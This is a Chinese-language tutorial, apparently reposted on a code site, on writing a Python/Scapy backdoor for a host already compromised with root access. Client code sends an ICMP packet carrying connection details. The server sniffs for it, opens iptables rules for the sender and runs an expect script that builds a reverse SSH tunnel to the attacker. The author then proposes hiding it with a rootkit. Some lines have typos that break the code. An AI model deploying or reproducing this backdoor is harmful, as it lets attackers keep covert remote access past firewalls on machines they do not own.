用Python编写一个简单的CS架构后门的方法
作者:吃面包的科学怪人 时间:2021-08-07 00:15:58
0x00:事先说明
你已经攻陷了对方主机且获得了最高权限。
对方的本地防火墙会丢弃所有的外来数据包。
这个后门不会仅绑定在某一个端口上。
这段代码很容易写,毕竟是 Python(准确说是 Python 2.x)。
0x01:工作原理
如你所见,客户端将伪造具有 ICMP 负载的特定数据包,另一方面在服务端,也就是我们的被攻击主机,将会接受我们发送的数据包,即使它开启了本地的防火墙(丢弃所有外来数据包)。关键在于无线网卡的监听模式,它无需和 AP 建立连接却可以和接受所有流经空气的数据包。
我们会用到一个有用的第三方包 Scapy。这是它的官方文档。如果你是第一次使用,不妨参考这篇文章,也许会有帮助。
0x02:客户端代码
'''
客户端代码。将服务端的 IP 地址、客户端的 IP 地址、客户端的连接端口,以及连接所需密码作为程序输入。如果成功返回一个交互式后门,在代码硬编码好的位置写入日志文件信息。
'''
#! /usr/bin/env python
import logging
import socket
from scapy.all import *
import os
import os.path
import sys
import time
logging.getLongger("scapy.runtime").setLevel(loggin.ERROR)
file_result = "/tmp/done"
if len(sys.argv) != 5:
print "usage : " + " IP_SERVER " + " CLIENT_IP " + " PORT_SSH_CLIENT " + “ PASSWORD_CLIENT ”
sys.exit(1)
server = sys.argv[1]
if os.path.isfile(file_result):
os.remove(file_result)
load = sys.argv[2] + "|" + sys.argv[3] + "|" + sys.argv[4]
pingr = IP(dst = server) / ICMP() / load
send(pingr, verbose = 0) # send() 函数工作在协议栈的第三层(网络层)
0x04:服务端代码
服务端代码分为两块:1. 主要脚本部分、2. ssh 隧道部分。
'''
服务端代码之主要脚本部分。这个脚本会监听 ICMP 数据包并从句法上分析其携带的数据部分(客户端 IP 地址、客户端连接端口、连接所需密码)。接着在本地打开两个新的防火墙规则。最后调用另一个 expect 脚本,以建立和客户端之间稳定的 ssh 连接。
'''
#! /usr/bin/env python
import logging
import socket
from scapy.all import *
import re
import subprocess # py2.4 新增模块,允许用户编写代码生成新进程,连接到它们的 input/output/error 管道,并获取它们的返回/状态码。
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
def icmp_monitor_callback(pkt):
reg = re.compile("(.*)\|(.*)\|(.*)")
g = reg.match(pkt.load)
if g:
subprocess.Popen(["/sbin/iptables", "-I", "INPUT", "1","-s",g.group(1),'-j','ACCEPT'])
subprocess.Popen(["/sbin/iptables", "-I", "OUTPUT", "1","-d",g.group(1),'-j','ACCEPT'])
p=subprocess.call(["/root/sshtunnel.sh", g.group(1),g.group(2),g.group(3)])
return
sniff(prn=icmp_monitor_callback, filter="icmp", store=0) # scapy.sniff() 函数会嗅探来自空气中的数据包,prn 参数用来指定回调函数,每当符合 filter 的报文被探测到时,就会执行回调函数。有关该函数的详细信息,可以参考这篇博客:https://thepacketgeek.com/scapy-sniffing-with-custom-actions-part-1/
'''
服务端代码之 ssh 隧道部分,实际上是一个简单的 expect 脚本。接受嗅探到的客户端 IP 地址、客户端端口,以及用于连接的密码作为输入。
'''
#!/usr/bin/expect -f
set ip [lindex $argv 0];
set port [lindex $argv 1];
set password [lindex $argv 2];
spawn ssh -o StrictHostKeyChecking=no -R 19999:localhost:$port $ip
expect "*?assword:*"
send "$password\r"
expect "*#"
send "touch /tmp/done\r"
interact
0x05:文末思考
上面完成的后门代码待完善的地方。
ICMP payload 应该被编码。
添加其他的协议用来唤醒该后门(如 http、特定的 syn 包、dns 等)。
写一个 rootkit,隐藏该后门,猥琐欲为。此乃后话。
有关 rootkit 的延伸阅读。
https://www.jb51.net/article/151111.htm
https://null-byte.wonderhowto.com/how-to/writing-windows-10-rootkit-part-1-0165781/
来源:https://blog.csdn.net/abc_12366/article/details/83028990
标签:python,cs,后门
![](/images/zang.png)
![](/images/jiucuo.png)
猜你喜欢
讲解SQL Server2005数据项的分拆与合并
2009-01-04 14:40:00
golang中使用匿名结构体的方法
2023-07-10 07:26:56
python实现飞机大战游戏
2021-09-30 12:05:06
![](https://img.aspxhome.com/file/2023/0/97390_0s.jpg)
Python Pywavelet 小波阈值实例
2021-09-10 23:19:18
Python统计分析模块statistics用法示例
2021-01-20 08:44:16
教你利用python实现企业微信发送消息
2023-09-06 11:20:55
![](https://img.aspxhome.com/file/2023/2/105052_0s.png)
python去除字符串中空格的6种常用方法
2023-09-25 12:36:53
Access数据库下如何使用通用对话框的问题
2008-11-28 16:37:00
连续字符自动换行的解决方案
2008-12-04 16:39:00
PHP根据key删除数组中指定的元素
2023-07-17 19:46:27
python-docx的简单使用示例教程
2023-10-27 08:32:08
MySQL字符集查看方法
2010-12-14 15:14:00
深度学习入门之Pytorch 数据增强的实现
2021-04-05 22:26:07
![](https://img.aspxhome.com/file/2023/0/87810_0s.jpg)
正视WEB标准,一本全面的标准参考书
2009-05-30 16:36:00
![](https://img.aspxhome.com/file/UploadPic/20095/30/s3396721-91s.jpg)
Python多进程协作模拟实现流程
2021-07-01 17:52:38
解决Keras使用GPU资源耗尽的问题
2023-06-26 05:43:51
python学习笔记之调用eval函数出现invalid syntax错误问题
2023-11-03 01:48:30
python网络编程之多线程同时接受和发送
2021-12-01 07:20:09
Django web自定义通用权限控制实现方法
2021-07-31 06:21:09
MSSQL MySQL 数据库分页(存储过程)
2012-01-29 18:30:20